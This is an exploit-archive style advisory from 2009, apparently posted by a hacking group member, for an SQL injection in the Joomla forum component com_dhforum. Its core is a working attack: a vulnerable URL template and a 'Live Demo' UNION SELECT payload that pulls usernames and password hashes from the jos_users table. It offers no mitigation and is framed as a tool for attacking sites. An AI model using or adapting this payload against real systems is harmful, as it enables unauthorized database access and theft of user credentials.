[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_dhforum SQL Injection Vulnerability
# Published : 2009-12-27
# Author : ViRuSMaN
# Previous Title : Cybershade CMS 0.2 Remote File Inclusion Vulnerability
# Next Title : Mambo Component Material Suche 1.0 SQL injection Vulnerability


==============================================================================
_ _ _ _ _ _
/  | | | | /  | | | |
/ _  | | | | / _  | |_| |
/ ___  | |___ | |___ / ___  | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|


==============================================================================
======
[?] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================

======

[?] Script: [ joomla Component ]
[?] Language: [ PHP ]
[?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[?] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[?] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[?] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]



===[ Live Demo ]===

[?] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat

(username,0x3a,password)+from+jos_users--

Author: ViRuSMaN <-

###########################################################################